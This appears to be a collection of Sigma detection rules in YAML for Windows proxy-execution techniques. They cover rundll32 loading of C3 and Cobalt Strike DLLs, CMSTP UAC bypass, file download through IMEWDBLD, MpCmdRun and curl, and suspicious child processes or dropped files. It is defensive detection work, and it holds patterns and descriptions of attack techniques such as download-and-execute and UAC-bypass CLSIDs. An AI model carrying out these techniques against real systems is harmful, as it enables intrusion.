title: HackTool - F-Secure C3 Load by Rundll32
id: b18c9d4c-fac9-4708-bd06-dd5bfacf200f
status: test
description: F-Secure C3 produces DLLs with a default exported StartNodeRelay function.
references:
    - https://github.com/FSecureLABS/C3/blob/11a081fd3be2aaf2a879f6b6e9a96ecdd24966ef/Src/NodeRelayDll/NodeRelayDll.cpp#L12
author: Alfie Champion (ajpc500)
date: 2021-06-02
modified: 2023-03-05
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'rundll32.exe'
            - '.dll'
            - 'StartNodeRelay'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Arbitrary File Download Via IMEWDBLD.EXE
id: 863218bd-c7d0-4c52-80cd-0a96c09f54af
related:
    - id: 8d7e392e-9b28-49e1-831d-5949c6281228
      type: derived
status: test
description: Detects usage of "IMEWDBLD.exe" to download arbitrary files
references:
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download
    - https://lolbas-project.github.io/lolbas/Binaries/IMEWDBLD/
author: Swachchhanda Shrawan Poudel
date: 2023-11-09
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\IMEWDBLD.exe'
        - OriginalFileName: 'imewdbld.exe'
    selection_cli:
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: all of selection_*
falsepositives:
    - Unknown
# Note: Please reduce this to medium if you find legitimate use case of this utility with a URL
level: high

title: BaaUpdate.exe Suspicious DLL Load
id: 6e8fe0a8-ba0b-4a93-8f9e-82657e7a5984
related:
    - id: 9f38c1db-e2ae-40bf-81d0-5b68f73fb512 # Suspicious BitLocker Access Agent Update Utility Execution
      type: similar
status: experimental
description: |
    Detects BitLocker Access Agent Update Utility (baaupdate.exe) loading DLLs from suspicious locations that are publicly writable which could indicate an attempt to lateral movement via BitLocker DCOM & COM Hijacking.
    This technique abuses COM Classes configured as INTERACTIVE USER to spawn processes in the context of the logged-on user's session. Specifically, it targets the BDEUILauncher Class (CLSID ab93b6f1-be76-4185-a488-a9001b105b94)
    which can launch BaaUpdate.exe, which is vulnerable to COM Hijacking when started with input parameters. This allows attackers to execute code in the user's context without needing to steal credentials or use additional techniques to compromise the account.
references:
    - https://github.com/rtecCyberSec/BitlockMove
author: Swachchhanda Shrawan Poudel (Nextron Systems)
date: 2025-10-18
tags:
    - attack.stealth
    - attack.t1218
    - attack.lateral-movement
    - attack.t1021.003
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\BaaUpdate.exe'
        ImageLoaded|endswith: '.dll'
        ImageLoaded|contains:
            - ':\Perflogs\'
            - ':\Users\Default\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '\AppData\Roaming\'
            - '\Contacts\'
            - '\Favorites\'
            - '\Favourites\'
            - '\Links\'
            - '\Music\'
            - '\Pictures\'
            - '\ProgramData\'
            - '\Temporary Internet'
            - '\Videos\'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
id: a7c3d773-caef-227e-a7e7-c2f13c622329
related:
    - id: f5647edc-a7bf-4737-ab50-ef8c60dc3add
      type: obsolete
status: test
description: |
    Detects attackers using tooling with bad opsec defaults.
    E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run.
    One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.
references:
    - https://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/
    - https://www.cobaltstrike.com/help-opsec
    - https://twitter.com/CyberRaiju/status/1251492025678983169
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/regsvr32
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/rundll32
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regasm-exe-assembly-registration-tool
    - https://learn.microsoft.com/en-us/dotnet/framework/tools/regsvcs-exe-net-services-installation-tool
author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
date: 2020-10-23
modified: 2024-08-15
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_werfault:
        Image|endswith: '\WerFault.exe'
        CommandLine|endswith: 'WerFault.exe'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    selection_regsvcs:
        Image|endswith: '\regsvcs.exe'
        CommandLine|endswith: 'regsvcs.exe'
    selection_regasm:
        Image|endswith: '\regasm.exe'
        CommandLine|endswith: 'regasm.exe'
    selection_regsvr32:
        Image|endswith: '\regsvr32.exe'
        CommandLine|endswith: 'regsvr32.exe'
    filter_optional_edge_update:
        ParentImage|contains: '\AppData\Local\Microsoft\EdgeUpdate\Install\{'
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    filter_optional_chromium_installer:
        # As reported in https://github.com/SigmaHQ/sigma/issues/4570 and others
        ParentImage|contains:
            - '\AppData\Local\BraveSoftware\Brave-Browser\Application\'
            - '\AppData\Local\Google\Chrome\Application\'
        ParentImage|endswith: '\Installer\setup.exe'
        ParentCommandLine|contains: '--uninstall '
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith: 'rundll32.exe'
    condition: 1 of selection_* and not 1 of filter_optional_*
falsepositives:
    - Unlikely
level: high

title: Bypass UAC via CMSTP
id: e66779cc-383e-4224-a3a4-267eeb585c40
status: test
description: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files
references:
    - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html
    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md
    - https://lolbas-project.github.io/lolbas/Binaries/Cmstp/
author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community
date: 2019-10-24
modified: 2022-08-30
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1548.002
    - attack.t1218.003
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\cmstp.exe'
        - OriginalFileName: 'CMSTP.EXE'
    selection_cli:
        CommandLine|contains:
            - '/s'
            - '-s'
            - '/au'
            - '-au'
            - '/ni'
            - '-ni'
    condition: all of selection*
falsepositives:
    - Legitimate use of cmstp.exe utility by legitimate user
level: high

title: CMSTP Execution Process Access
id: 3b4b232a-af90-427c-a22f-30b0c0837b95
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2021-06-27
tags:
    - attack.stealth
    - attack.t1218.003
    - attack.execution
    - attack.t1559.001
    - attack.g0069
    - attack.g0080
    - car.2019-04-001
logsource:
    product: windows
    category: process_access
detection:
    # Process Access Call Trace
    selection:
        CallTrace|contains: 'cmlua.dll'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CMSTP Execution Process Creation
id: 7d4cdc5a-0076-40ca-aac8-f7e714570e47
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    # CMSTP Spawning Child Process
    selection:
        ParentImage|endswith: '\cmstp.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CMSTP Execution Registry Event
id: b6d235fc-1d38-4b12-adbe-325f06728f37
status: stable
description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
author: Nik Seetharaman
date: 2018-07-16
modified: 2020-12-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: '\cmmgr32.exe'
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CMSTP UAC Bypass via COM Object Access
id: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253
status: stable
description: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)
references:
    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
    - https://twitter.com/hFireF0X/status/897640081053364225
    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf
    - https://github.com/hfiref0x/UACME
author: Nik Seetharaman, Christian Burkard (Nextron Systems)
date: 2019-07-31
modified: 2024-12-01
tags:
    - attack.execution
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1548.002
    - attack.t1218.003
    - attack.g0069
    - car.2019-04-001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\DllHost.exe'
        ParentCommandLine|contains:
            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll
            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL
            - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll
            - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll
            - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl
        IntegrityLevel:
            - 'High'
            - 'System'
            - 'S-1-16-16384' # System
            - 'S-1-16-12288' # High
    condition: selection
falsepositives:
    - Legitimate CMSTP use (unlikely in modern enterprise environments)
level: high

title: CobaltStrike Load by Rundll32
id: ae9c6a7c-9521-42a6-915e-5aaa8689d529
status: test
description: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
references:
    - https://www.cobaltstrike.com/help-windows-executable
    - https://redcanary.com/threat-detection-report/
    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/
author: Wojciech Lesicki
date: 2021-06-01
modified: 2022-09-16
tags:
    - attack.stealth
    - attack.t1218.011
logsource:
    category: process_creation
    product: windows
detection:
    selection_rundll:
        - Image|endswith: '\rundll32.exe'
        - OriginalFileName: RUNDLL32.EXE
        - CommandLine|contains:
              - 'rundll32.exe'
              - 'rundll32 '
    selection_params:
        CommandLine|contains: '.dll'
        CommandLine|endswith:
            - ' StartW'
            - ',StartW'
    condition: all of selection*
falsepositives:
    - Unknown
level: high

title: Control Panel Items
id: 0ba863e6-def5-4e50-9cea-4dd8c7dc46a4
status: test
description: Detects the malicious use of a control panel item
references:
    - https://ired.team/offensive-security/code-execution/code-execution-through-control-panel-add-ins
author: Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)
date: 2020-06-22
modified: 2023-10-11
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1218.002
    - attack.persistence
    - attack.t1546
logsource:
    product: windows
    category: process_creation
detection:
    selection_reg_img:
        - Image|endswith: '\reg.exe'
        - OriginalFileName: 'reg.exe'
    selection_reg_cli:
        CommandLine|contains|all:
            - 'add'
            - 'CurrentVersion\Control Panel\CPLs'
    selection_cpl:
        CommandLine|endswith: '.cpl'
    filter_cpl_sys:
        CommandLine|contains:
            - '\System32\'
            - '%System%'
            - '|C:\Windows\system32|'
    filter_cpl_igfx:
        CommandLine|contains|all:
            - 'regsvr32 '
            - ' /s '
            - 'igfxCPL.cpl'
    condition: all of selection_reg_* or (selection_cpl and not 1 of filter_cpl_*)
falsepositives:
    - Unknown
level: high

title: Csc.EXE Execution Form Potentially Suspicious Parent
id: b730a276-6b63-41b8-bcf8-55930c8fc6ee
status: test
description: Detects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
references:
    - https://www.uptycs.com/blog/warzonerat-can-now-evade-with-process-hollowing
    - https://reaqta.com/2017/11/short-journey-darkvnc/
    - https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/yellow-liderc-ships-its-scripts-delivers-imaploader-malware.html
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)
date: 2019-02-11
modified: 2026-03-23
tags:
    - attack.execution
    - attack.stealth
    - attack.t1059.005
    - attack.t1059.007
    - attack.t1218.005
    - attack.t1027.004
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\csc.exe'
        - OriginalFileName: 'csc.exe'
    selection_parent_generic:
        ParentImage|endswith:
            - '\cscript.exe'
            - '\excel.exe'
            - '\mshta.exe'
            - '\onenote.exe'
            - '\outlook.exe'
            - '\powerpnt.exe'
            - '\winword.exe'
            - '\wscript.exe'
    selection_parent_powershell:
        ParentImage|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        ParentCommandLine|contains:
            - '-Encoded '
            - 'FromBase64String'
    selection_parent_susp_location:
        - ParentCommandLine|re: '(?:[Pp]rogram[Dd]ata|%(?:[Ll]ocal)?[Aa]pp[Dd]ata%|\\[Aa]pp[Dd]ata\\(?:[Ll]ocal(?:[Ll]ow)?|[Rr]oaming))\\[^\\]{1,256}$'
        - ParentCommandLine|contains:
              - ':\PerfLogs\'
              - ':\Users\Public\'
              - ':\Windows\Temp\'
              - '\Temporary Internet'
        - ParentCommandLine|contains|all:
              - ':\Users\'
              - '\Favorites\'
        - ParentCommandLine|contains|all:
              - ':\Users\'
              - '\Favourites\'
        - ParentCommandLine|contains|all:
              - ':\Users\'
              - '\Contacts\'
        - ParentCommandLine|contains|all:
              - ':\Users\'
              - '\Pictures\'
    filter_main_programfiles:
        # Note: this is a generic filter. You could baseline execution in your env for a more robust rule
        ParentImage|startswith:
            - 'C:\Program Files (x86)\' # https://twitter.com/gN3mes1s/status/1206874118282448897
            - 'C:\Program Files\' # https://twitter.com/gN3mes1s/status/1206874118282448897
    filter_main_sdiagnhost:
        ParentImage: 'C:\Windows\System32\sdiagnhost.exe' # https://twitter.com/gN3mes1s/status/1206874118282448897
    filter_main_w3p:
        ParentImage: 'C:\Windows\System32\inetsrv\w3wp.exe' # https://twitter.com/gabriele_pippi/status/1206907900268072962
    filter_optional_chocolatey:
        ParentImage: 'C:\ProgramData\chocolatey\choco.exe' # Chocolatey https://chocolatey.org/
    filter_optional_defender:
        ParentCommandLine|contains: '\ProgramData\Microsoft\Windows Defender Advanced Threat Protection'
    filter_optional_ansible:
        # Note: As ansible is widely used we exclude it with this generic filter.
        # A better option would be to filter based on script content basis or other marker while hunting
        ParentCommandLine|contains:
            # '{"failed":true,"msg":"Ansible requires PowerShell v3.0 or newer"}'
            - 'JwB7ACIAZgBhAGkAbABlAGQAIgA6AHQAcgB1AGUALAAiAG0AcwBnACIAOgAiAEEAbgBzAGkAYgBsAGUAIAByAGUAcQB1AGkAcgBlAHMAIABQAG8AdwBlAHIAUwBoAGUAbABsACAAdgAzAC4AMAAgAG8AcgAgAG4AZQB3AGUAcgAiAH0AJw'
            - 'cAewAiAGYAYQBpAGwAZQBkACIAOgB0AHIAdQBlACwAIgBtAHMAZwAiADoAIgBBAG4AcwBpAGIAbABlACAAcgBlAHEAdQBpAHIAZQBzACAAUABvAHcAZQByAFMAaABlAGwAbAAgAHYAMwAuADAAIABvAHIAIABuAGUAdwBlAHIAIgB9ACcA'
            - 'nAHsAIgBmAGEAaQBsAGUAZAAiADoAdAByAHUAZQAsACIAbQBzAGcAIgA6ACIAQQBuAHMAaQBiAGwAZQAgAHIAZQBxAHUAaQByAGUAcwAgAFAAbwB3AGUAcgBTAGgAZQBsAGwAIAB2ADMALgAwACAAbwByACAAbgBlAHcAZQByACIAfQAnA'
    condition: selection_img and 1 of selection_parent_* and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: high

title: Curl Download And Execute Combination
id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288
status: test
description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
references:
    - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link
author: Sreeman, Nasreddine Bencherchali (Nextron Systems)
date: 2020-01-13
modified: 2024-03-05
tags:
    - attack.stealth
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|windash: ' -c '
        CommandLine|contains|all:
            - 'curl '
            - 'http'
            - '-o'
            - '&'
    condition: selection
falsepositives:
    - Unknown
level: high

title: DLL Loaded From Suspicious Location Via Cmspt.EXE
id: 75e508f7-932d-4ebc-af77-269237a84ce1
status: test
description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
references:
    - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-08-30
modified: 2023-02-17
tags:
    - attack.stealth
    - attack.t1218.003
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Image|endswith: '\cmstp.exe'
        ImageLoaded|contains:
            # Add more suspicious paths as you see fit in your env
            - '\PerfLogs\'
            - '\ProgramData\'
            - '\Users\'
            - '\Windows\Temp\'
            - 'C:\Temp\'
        ImageLoaded|endswith:
            - '.dll'
            - '.ocx'
    condition: selection
falsepositives:
    - Unikely
level: high

title: Devtoolslauncher.exe Executes Specified Binary
id: cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6
status: test
description: The Devtoolslauncher.exe executes other binary
references:
    - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Devtoolslauncher/
    - https://twitter.com/_felamos/status/1179811992841797632
author: Beyu Denis, oscd.community (rule), @_felamos (idea)
date: 2019-10-12
modified: 2021-11-27
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\devtoolslauncher.exe'
        CommandLine|contains: 'LaunchForDeploy'
    condition: selection
falsepositives:
    - Legitimate use of devtoolslauncher.exe by legitimate user
level: high

title: Execute Pcwrun.EXE To Leverage Follina
id: 6004abd0-afa4-4557-ba90-49d172e0a299
status: test
description: Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability
references:
    - https://twitter.com/nas_bench/status/1535663791362519040
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-06-13
tags:
    - attack.stealth
    - attack.t1218
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\pcwrun.exe'
        CommandLine|contains: '../'
    condition: selection
falsepositives:
    - Unlikely
level: high

title: Execution DLL of Choice Using WAB.EXE
id: fc014922-5def-4da9-a0fc-28c973f41bfb
status: test
description: This rule detects that the path to the DLL written in the registry is different from the default one. Launched WAB.exe tries to load the DLL from Registry.
references:
    - https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml
    - https://twitter.com/Hexacorn/status/991447379864932352
    - http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/
author: oscd.community, Natalia Shornikova
date: 2020-10-13
modified: 2023-08-17
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Software\Microsoft\WAB\DLLPath'
    filter:
        Details: '%CommonProgramFiles%\System\wab32.dll'
    condition: selection and not filter
falsepositives:
    - Unknown
level: high

title: Execution via WorkFolders.exe
id: 0bbc6369-43e3-453d-9944-cae58821c173
status: test
description: Detects using WorkFolders.exe to execute an arbitrary control.exe
references:
    - https://twitter.com/elliotkillick/status/1449812843772227588
author: Maxime Thiebaut (@0xThiebaut)
date: 2021-10-21
modified: 2022-12-25
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\control.exe'
        ParentImage|endswith: '\WorkFolders.exe'
    filter:
        Image: 'C:\Windows\System32\control.exe'
    condition: selection and not filter
falsepositives:
    - Legitimate usage of the uncommon Windows Work Folders feature.
level: high

title: Execution via stordiag.exe
id: 961e0abb-1b1e-4c84-a453-aafe56ad0d34
status: test
description: Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe
references:
    - https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html
    - https://twitter.com/eral4m/status/1451112385041911809
author: Austin Songer (@austinsonger)
date: 2021-10-21
modified: 2022-12-25
tags:
    - attack.stealth
    - attack.t1218
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\stordiag.exe'
        Image|endswith:
            - '\schtasks.exe'
            - '\systeminfo.exe'
            - '\fltmc.exe'
    filter:
        ParentImage|startswith: # as first is "Copy c:\windows\system32\stordiag.exe to a folder"
            - 'c:\windows\system32\'
            - 'c:\windows\syswow64\'
    condition: selection and not filter
falsepositives:
    - Legitimate usage of stordiag.exe.
level: high

title: File Download Via Windows Defender MpCmpRun.EXE
id: 46123129-1024-423e-9fae-43af4a0fa9a5
status: test
description: Detects the use of Windows Defender MpCmdRun.EXE to download files
references:
    - https://web.archive.org/web/20200903194959/https://twitter.com/djmtshepana/status/1301608169496612866
    - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/
author: Matthew Matchen
date: 2020-09-04
modified: 2023-11-09
tags:
    - attack.stealth
    - attack.t1218
    - attack.command-and-control
    - attack.t1105
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - OriginalFileName: 'MpCmdRun.exe'
        - Image|endswith: '\MpCmdRun.exe'
        - CommandLine|contains: 'MpCmdRun.exe'
        - Description: 'Microsoft Malware Protection Command Line Utility'
    selection_cli:
        CommandLine|contains|all:
            - 'DownloadFile'
            - 'url'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high

title: HTML Help HH.EXE Suspicious Child Process
id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
status: test
description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
references:
    - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
    - https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7
    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
    - https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
date: 2020-04-01
modified: 2023-04-12
tags:
    - attack.execution
    - attack.initial-access
    - attack.stealth
    - attack.t1047
    - attack.t1059.001
    - attack.t1059.003
    - attack.t1059.005
    - attack.t1059.007
    - attack.t1218
    - attack.t1218.001
    - attack.t1218.010
    - attack.t1218.011
    - attack.t1566
    - attack.t1566.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\hh.exe'
        Image|endswith:
            - '\CertReq.exe'
            - '\CertUtil.exe'
            - '\cmd.exe'
            - '\cscript.exe'
            - '\installutil.exe'
            - '\MSbuild.exe'
            - '\MSHTA.EXE'
            - '\msiexec.exe'
            - '\powershell.exe'
            - '\pwsh.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\schtasks.exe'
            - '\wmic.exe'
            - '\wscript.exe'
    condition: selection
falsepositives:
    - Unknown
level: high

title: HackTool - CACTUSTORCH Remote Thread Creation
id: 2e4e488a-6164-4811-9ea1-f960c7359c40
status: test
description: Detects remote thread creation from CACTUSTORCH as described in references.
references:
    - https://twitter.com/SBousseaden/status/1090588499517079552 # Deleted
    - https://github.com/mdsecactivebreach/CACTUSTORCH
author: '@SBousseaden (detection), Thomas Patzke (rule)'
date: 2019-02-01
modified: 2023-05-05
tags:
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1055.012
    - attack.t1059.005
    - attack.t1059.007
    - attack.t1218.005
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        SourceImage|endswith:
            - '\System32\cscript.exe'
            - '\System32\wscript.exe'
            - '\System32\mshta.exe'
            - '\winword.exe'
            - '\excel.exe'
        TargetImage|contains: '\SysWOW64\'
        StartModule: null
    condition: selection
falsepositives:
    - Unknown
level: high

title: HackTool - RedMimicry Winnti Playbook Execution
id: 95022b85-ff2a-49fa-939a-d7b8f56eeb9b
status: test
description: Detects actions caused by the RedMimicry Winnti playbook a automated breach emulations utility
references:
    - https://redmimicry.com/posts/redmimicry-winnti/
author: Alexander Rausch
date: 2020-06-24
modified: 2023-03-01
tags:
    - attack.execution
    - attack.stealth
    - attack.t1106
    - attack.t1059.003
    - attack.t1218.011
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\rundll32.exe'
            - '\cmd.exe'
        CommandLine|contains:
            - 'gthread-3.6.dll'
            - '\Windows\Temp\tmp.bat'
            - 'sigcmm-2.4.dll'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Legitimate Application Dropped Archive
id: 654fcc6d-840d-4844-9b07-2c3300e54a26
status: test
description: Detects programs on a Windows system that should not write an archive to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth
date: 2022-08-21
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables
            - \winword.exe
            - \excel.exe
            - \powerpnt.exe
            - \msaccess.exe
            - \mspub.exe
            - \eqnedt32.exe
            - \visio.exe
            - \wordpad.exe
            - \wordview.exe
            # LOLBINs that can be used to download executables
            - \certutil.exe
            - \certoc.exe
            - \CertReq.exe
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - \Desktopimgdownldr.exe
            - \esentutl.exe
            # - \expand.exe
            - \finger.exe
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - \notepad.exe
            - \AcroRd32.exe
            - \RdrCEF.exe
            - \mshta.exe
            - \hh.exe
        TargetFilename|endswith:
            - '.zip'
            - '.rar'
            - '.7z'
            - '.diagcab'
            - '.appx'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Legitimate Application Dropped Executable
id: f0540f7e-2db3-4432-b9e0-3965486744bc
status: test
description: Detects programs on a Windows system that should not write executables to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - '\eqnedt32.exe'
            - '\wordpad.exe'
            - '\wordview.exe'
            # LOLBINs that can be used to download executables
            - '\certutil.exe'
            - '\certoc.exe'
            - '\CertReq.exe'
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - '\Desktopimgdownldr.exe'
            - '\esentutl.exe'
            # - \expand.exe
            - '\mshta.exe'
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - '\AcroRd32.exe'
            - '\RdrCEF.exe'
            - '\hh.exe'
            - '\finger.exe'
        TargetFilename|endswith:
            - '.exe'
            - '.dll'
            - '.ocx'
    condition: selection
falsepositives:
    - Unknown
level: high

title: Legitimate Application Dropped Script
id: 7d604714-e071-49ff-8726-edeb95a70679
status: test
description: Detects programs on a Windows system that should not write scripts to disk
references:
    - https://github.com/Neo23x0/sysmon-config/blob/3f808d9c022c507aae21a9346afba4a59dd533b9/sysmonconfig-export-block.xml#L1326
author: frack113, Florian Roth (Nextron Systems)
date: 2022-08-21
modified: 2023-06-22
tags:
    - attack.stealth
    - attack.t1218
logsource:
    product: windows
    category: file_event
detection:
    selection:
        Image|endswith:
            # Microsoft Office Programs Dropping Executables / Rest of the apps are covered in: c7a74c80-ba5a-486e-9974-ab9e682bc5e4
            - \eqnedt32.exe
            - \wordpad.exe
            - \wordview.exe
            # LOLBINs that can be used to download executables
            - \certutil.exe
            - \certoc.exe
            - \CertReq.exe
            # - \bitsadmin.exe (depends on the environment; comment in if you're sure that bitsadmin doesn't do that in your env)
            - \Desktopimgdownldr.exe
            - \esentutl.exe
            # - \expand.exe
            - '\mshta.exe'
            # Executables that should never drop an executable to disk (but may after a previous process injection or if it's malware that uses a legitimate name)
            - '\AcroRd32.exe'
            - '\RdrCEF.exe'
